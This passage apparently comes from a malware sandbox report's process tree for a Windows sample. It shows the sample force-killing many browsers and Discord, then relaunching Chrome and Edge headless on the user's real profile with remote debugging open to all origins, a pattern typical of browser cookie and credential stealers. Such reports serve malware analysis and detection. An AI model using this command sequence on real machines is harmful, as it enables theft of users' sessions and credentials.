                                      • C:\Windows\system32\taskkill.exe
                                        "taskkill" /IM msedge.exe
                                        7⤵
                                        • Kills process with taskkill
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:992
                                      • C:\Windows\system32\taskkill.exe
                                        "taskkill" /IM brave.exe
                                        7⤵
                                        • Kills process with taskkill
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1944
                                      • C:\Windows\system32\tasklist.exe
                                        "tasklist"
                                        7⤵
                                        • Enumerates processes with tasklist
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4156
                                      • C:\Windows\system32\taskkill.exe
                                        "taskkill" /IM opera.exe
                                        7⤵
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:3140
                                        • C:\Windows\System32\Conhost.exe
                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          8⤵
                                            PID:4108
                                        • C:\Windows\system32\tasklist.exe
                                          "tasklist"
                                          7⤵
                                          • Enumerates processes with tasklist
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:3188
                                        • C:\Windows\system32\taskkill.exe
                                          "taskkill" /IM vivaldi.exe
                                          7⤵
                                          • Kills process with taskkill
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:3628
                                        • C:\Windows\system32\tasklist.exe
                                          "tasklist"
                                          7⤵
                                          • Enumerates processes with tasklist
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2088
                                        • C:\Windows\system32\taskkill.exe
                                          "taskkill" /IM firefox.exe
                                          7⤵
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:4240
                                        • C:\Windows\system32\taskkill.exe
                                          "taskkill" /IM dragon.exe
                                          7⤵
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:956
                                          • C:\Windows\System32\Conhost.exe
                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            8⤵
                                              PID:4224
                                          • C:\Windows\system32\tasklist.exe
                                            "tasklist"
                                            7⤵
                                            • Enumerates processes with tasklist
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:1860
                                            • C:\Windows\System32\Conhost.exe
                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              8⤵
                                                PID:2012
                                            • C:\Windows\system32\taskkill.exe
                                              "taskkill" /IM maxthon.exe
                                              7⤵
                                              • Kills process with taskkill
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:5064
                                            • C:\Windows\system32\taskkill.exe
                                              "taskkill" /IM uc_browser.exe
                                              7⤵
                                              • Kills process with taskkill
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:2636
                                            • C:\Windows\system32\tasklist.exe
                                              "tasklist"
                                              7⤵
                                              • Enumerates processes with tasklist
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:4268
                                            • C:\Windows\system32\taskkill.exe
                                              "taskkill" /IM slimjet.exe
                                              7⤵
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:672
                                            • C:\Windows\system32\taskkill.exe
                                              "taskkill" /IM cent_browser.exe
                                              7⤵
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:4780
                                            • C:\Windows\system32\tasklist.exe
                                              "tasklist"
                                              7⤵
                                              • Enumerates processes with tasklist
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:4416
                                            • C:\Windows\system32\taskkill.exe
                                              "taskkill" /IM epic.exe
                                              7⤵
                                              • Kills process with taskkill
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:1920
                                            • C:\Windows\system32\taskkill.exe
                                              "taskkill" /IM torch.exe
                                              7⤵
                                              • Kills process with taskkill
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:3412
                                            • C:\Windows\system32\taskkill.exe
                                              "taskkill" /F /IM chrome.exe
                                              7⤵
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:1740
                                            • C:\Windows\system32\taskkill.exe
                                              "taskkill" /IM whale.exe
                                              7⤵
                                              • Kills process with taskkill
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:3924
                                            • C:\Windows\system32\taskkill.exe
                                              "taskkill" /F /IM Discord.exe
                                              7⤵
                                              • Kills process with taskkill
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:4240
                                            • C:\Windows\system32\taskkill.exe
                                              "taskkill" /IM 360browser.exe
                                              7⤵
                                              • Kills process with taskkill
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:2088
                                            • C:\Windows\system32\taskkill.exe
                                              "taskkill" /F /IM DiscordCanary.exe
                                              7⤵
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:3956
                                            • C:\Windows\system32\taskkill.exe
                                              "taskkill" /IM qqbrowser.exe
                                              7⤵
                                              • Kills process with taskkill
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:4868
                                            • C:\Windows\system32\taskkill.exe
                                              "taskkill" /F /IM DiscordPTB.exe
                                              7⤵
                                              • Kills process with taskkill
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:4472
                                            • C:\Windows\system32\taskkill.exe
                                              "taskkill" /IM browser.exe
                                              7⤵
                                              • Kills process with taskkill
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:1208
                                            • C:\Windows\system32\taskkill.exe
                                              "taskkill" /F /IM DiscordDevelopment.exe
                                              7⤵
                                              • Kills process with taskkill
                                              PID:3292
                                              • C:\Windows\System32\Conhost.exe
                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                8⤵
                                                  PID:5048
                                              • C:\Windows\system32\taskkill.exe
                                                "taskkill" /F /IM chrome.exe
                                                7⤵
                                                • Kills process with taskkill
                                                PID:2304
                                              • C:\Windows\system32\taskkill.exe
                                                "taskkill" /F /IM msedge.exe
                                                7⤵
                                                • Kills process with taskkill
                                                PID:5056
                                                • C:\Windows\System32\Conhost.exe
                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  8⤵
                                                    PID:4416
                                                • C:\Windows\system32\taskkill.exe
                                                  "taskkill" /F /IM brave.exe
                                                  7⤵
                                                  • Kills process with taskkill
                                                  PID:2092
                                                • C:\Windows\system32\taskkill.exe
                                                  "taskkill" /F /IM opera.exe
                                                  7⤵
                                                  • Kills process with taskkill
                                                  PID:632
                                                • C:\Windows\system32\taskkill.exe
                                                  "taskkill" /F /IM vivaldi.exe
                                                  7⤵
                                                  • Kills process with taskkill
                                                  PID:2040
                                                • C:\Windows\system32\taskkill.exe
                                                  "taskkill" /F /IM firefox.exe
                                                  7⤵
                                                  • Kills process with taskkill
                                                  PID:3532
                                                • C:\Windows\system32\taskkill.exe
                                                  "taskkill" /F /IM dragon.exe
                                                  7⤵
                                                  • Kills process with taskkill
                                                  PID:1752
                                                • C:\Windows\system32\taskkill.exe
                                                  "taskkill" /F /IM maxthon.exe
                                                  7⤵
                                                  • Kills process with taskkill
                                                  PID:4120
                                                • C:\Windows\system32\taskkill.exe
                                                  "taskkill" /F /IM uc_browser.exe
                                                  7⤵
                                                  • Kills process with taskkill
                                                  PID:1500
                                                  • C:\Windows\System32\Conhost.exe
                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    8⤵
                                                      PID:4268
                                                  • C:\Windows\system32\taskkill.exe
                                                    "taskkill" /F /IM slimjet.exe
                                                    7⤵
                                                    • Kills process with taskkill
                                                    PID:3592
                                                  • C:\Windows\system32\taskkill.exe
                                                    "taskkill" /F /IM cent_browser.exe
                                                    7⤵
                                                    • Kills process with taskkill
                                                    PID:4344
                                                  • C:\Windows\system32\taskkill.exe
                                                    "taskkill" /F /IM epic.exe
                                                    7⤵
                                                    • Kills process with taskkill
                                                    PID:3924
                                                    • C:\Windows\System32\Conhost.exe
                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      8⤵
                                                        PID:632
                                                    • C:\Windows\system32\taskkill.exe
                                                      "taskkill" /F /IM torch.exe
                                                      7⤵
                                                        PID:4240
                                                      • C:\Windows\system32\taskkill.exe
                                                        "taskkill" /F /IM whale.exe
                                                        7⤵
                                                        • Kills process with taskkill
                                                        PID:3316
                                                      • C:\Windows\system32\taskkill.exe
                                                        "taskkill" /F /IM 360browser.exe
                                                        7⤵
                                                        • Kills process with taskkill
                                                        PID:3220
                                                        • C:\Windows\System32\Conhost.exe
                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          8⤵
                                                            PID:3532
                                                        • C:\Windows\system32\taskkill.exe
                                                          "taskkill" /F /IM qqbrowser.exe
                                                          7⤵
                                                          • Kills process with taskkill
                                                          PID:4380
                                                          • C:\Windows\System32\Conhost.exe
                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            8⤵
                                                              PID:1752
                                                          • C:\Windows\system32\taskkill.exe
                                                            "taskkill" /F /IM browser.exe
                                                            7⤵
                                                              PID:3336
                                                              • C:\Windows\System32\Conhost.exe
                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                8⤵
                                                                  PID:4120
                                                              • C:\Windows\system32\tasklist.exe
                                                                "tasklist" /FI "IMAGENAME eq chrome.exe"
                                                                7⤵
                                                                • Enumerates processes with tasklist
                                                                PID:1288
                                                                • C:\Windows\System32\Conhost.exe
                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  8⤵
                                                                    PID:4868
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless=new --disable-extensions --disable-gpu --no-sandbox --disable-software-rasterizer --disable-dev-shm-usage --disable-background-networking --disable-default-apps --disable-translate --disable-sync --metrics-recording-only --mute-audio --no-first-run --no-default-browser-check --remote-debugging-port=46199 --remote-allow-origins=* "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --profile-directory=Default
                                                                  7⤵
                                                                  • Uses browser remote debugging
                                                                  • Checks processor information in registry
                                                                  • Enumerates system info in registry
                                                                  • Modifies data under HKEY_USERS
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  • Suspicious use of FindShellTrayWindow
                                                                  PID:3756
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8338edcf8,0x7ff8338edd04,0x7ff8338edd10
                                                                    8⤵
                                                                      PID:4788
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-sandbox --headless=new --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --gpu-preferences=UAAAAAAAAADgAQAEAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=disabled --field-trial-handle=2440,i,16005329379193650015,4454532736332330837,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2432 /prefetch:2
                                                                      8⤵
                                                                      • Modifies registry class
                                                                      PID:2364
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2388,i,16005329379193650015,4454532736332330837,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2528 /prefetch:3
                                                                      8⤵
                                                                        PID:2304
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2764,i,16005329379193650015,4454532736332330837,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2756 /prefetch:8
                                                                        8⤵
                                                                          PID:3188
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=46199 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=2956,i,16005329379193650015,4454532736332330837,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2952 /prefetch:1
                                                                          8⤵
                                                                          • Uses browser remote debugging
                                                                          PID:724
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=46199 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3172,i,16005329379193650015,4454532736332330837,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3164 /prefetch:1
                                                                          8⤵
                                                                          • Uses browser remote debugging
                                                                          PID:3296
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=46199 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3960,i,16005329379193650015,4454532736332330837,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3956 /prefetch:1
                                                                          8⤵
                                                                          • Uses browser remote debugging
                                                                          PID:4548
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=4528,i,16005329379193650015,4454532736332330837,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4524 /prefetch:8
                                                                          8⤵
                                                                            PID:5620
                                                                        • C:\Windows\system32\tasklist.exe
                                                                          "tasklist" /FI "IMAGENAME eq chrome.exe"
                                                                          7⤵
                                                                          • Enumerates processes with tasklist
                                                                          PID:5432
                                                                        • C:\Windows\system32\taskkill.exe
                                                                          "taskkill" /F /IM chrome.exe
                                                                          7⤵
                                                                          • Kills process with taskkill
                                                                          PID:5488
                                                                        • C:\Windows\system32\tasklist.exe
                                                                          "tasklist" /FI "IMAGENAME eq msedge.exe"
                                                                          7⤵
                                                                          • Enumerates processes with tasklist
                                                                          PID:5560
                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --headless=new --disable-extensions --disable-gpu --no-sandbox --disable-software-rasterizer --disable-dev-shm-usage --disable-background-networking --disable-default-apps --disable-translate --disable-sync --metrics-recording-only --mute-audio --no-first-run --no-default-browser-check --remote-debugging-port=40139 --remote-allow-origins=* "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --profile-directory=Default
                                                                          7⤵
                                                                          • Uses browser remote debugging
                                                                          • Checks processor information in registry
                                                                          • Enumerates system info in registry
                                                                          • Modifies data under HKEY_USERS
                                                                          • Modifies registry class
                                                                          • Suspicious use of FindShellTrayWindow
                                                                          PID:5660
                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x230,0x234,0x238,0x22c,0x354,0x7ff833c6f208,0x7ff833c6f214,0x7ff833c6f220
                                                                            8⤵
                                                                              PID:4652
                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --no-sandbox --headless=new --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --gpu-preferences=UAAAAAAAAADgAQAEAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=disabled --always-read-main-dll --field-trial-handle=2620,i,18353781570097769661,15018734977791032173,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2612 /prefetch:2
                                                                              8⤵
                                                                              • Modifies registry class
                                                                              PID:5836
                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=3148,i,18353781570097769661,15018734977791032173,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3176 /prefetch:3
                                                                              8⤵
                                                                                PID:6120
                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2732,i,18353781570097769661,15018734977791032173,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3444 /prefetch:8
                                                                                8⤵
                                                                                  PID:5372
                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --no-sandbox --remote-debugging-port=40139 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3504,i,18353781570097769661,15018734977791032173,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3488 /prefetch:1
                                                                                  8⤵
                                                                                  • Uses browser remote debugging
                                                                                  PID:5380
                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --instant-process --no-sandbox --remote-debugging-port=40139 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3528,i,18353781570097769661,15018734977791032173,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3512 /prefetch:1
                                                                                  8⤵
                                                                                  • Uses browser remote debugging
                                                                                  PID:5404
                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --no-sandbox --remote-debugging-port=40139 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4308,i,18353781570097769661,15018734977791032173,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4304 /prefetch:1
                                                                                  8⤵
                                                                                  • Uses browser remote debugging
                                                                                  PID:3552
                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --extension-process --renderer-sub-type=extension --no-sandbox --remote-debugging-port=40139 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4380,i,18353781570097769661,15018734977791032173,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4384 /prefetch:2
                                                                                  8⤵
                                                                                  • Uses browser remote debugging
                                                                                  PID:5160
                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=4576,i,18353781570097769661,15018734977791032173,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4568 /prefetch:8
                                                                                  8⤵
                                                                                    PID:6060
                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --no-sandbox --mute-audio --onnx-enabled-for-ee --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=4656,i,18353781570097769661,15018734977791032173,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4652 /prefetch:8
                                                                                    8⤵
                                                                                      PID:5180
                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=4972,i,18353781570097769661,15018734977791032173,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4968 /prefetch:8
                                                                                      8⤵
                                                                                        PID:5680
                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=4972,i,18353781570097769661,15018734977791032173,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4968 /prefetch:8
                                                                                        8⤵
                                                                                          PID:5984
                                                                                      • C:\Windows\system32\tasklist.exe
                                                                                        "tasklist" /FI "IMAGENAME eq msedge.exe"
                                                                                        7⤵
                                                                                        • Enumerates processes with tasklist
                                                                                        PID:5420
                                                                                      • C:\Windows\system32\tasklist.exe
                                                                                        "tasklist" /FI "IMAGENAME eq msedge.exe"
                                                                                        7⤵
                                                                                        • Enumerates processes with tasklist
                                                                                        PID:6460
                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --headless=new --disable-extensions --disable-gpu --no-sandbox --disable-software-rasterizer --disable-dev-shm-usage --disable-background-networking --disable-default-apps --disable-translate --disable-sync --metrics-recording-only --mute-audio --no-first-run --no-default-browser-check --remote-debugging-port=41650 --remote-allow-origins=* "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --profile-directory=Default
                                                                                        7⤵
                                                                                        • Uses browser remote debugging
                                                                                        • Checks processor information in registry
                                                                                        • Enumerates system info in registry
                                                                                        • Modifies data under HKEY_USERS
                                                                                        • Modifies registry class
                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                        PID:5160
                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x230,0x234,0x238,0x22c,0x2a4,0x7ff83155f208,0x7ff83155f214,0x7ff83155f220
                                                                                          8⤵
                                                                                            PID:2620
                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --no-sandbox --headless=new --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --gpu-preferences=UAAAAAAAAADgAQAEAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=disabled --always-read-main-dll --field-trial-handle=2220,i,11337164543081192294,9610328411447681556,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2168 /prefetch:2
                                                                                            8⤵
                                                                                            • Modifies registry class
                                                                                            PID:3088
                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2948,i,11337164543081192294,9610328411447681556,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2956 /prefetch:3
                                                                                            8⤵
                                                                                              PID:5424
                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2868,i,11337164543081192294,9610328411447681556,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3024 /prefetch:8
                                                                                              8⤵
                                                                                                PID:4012
                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
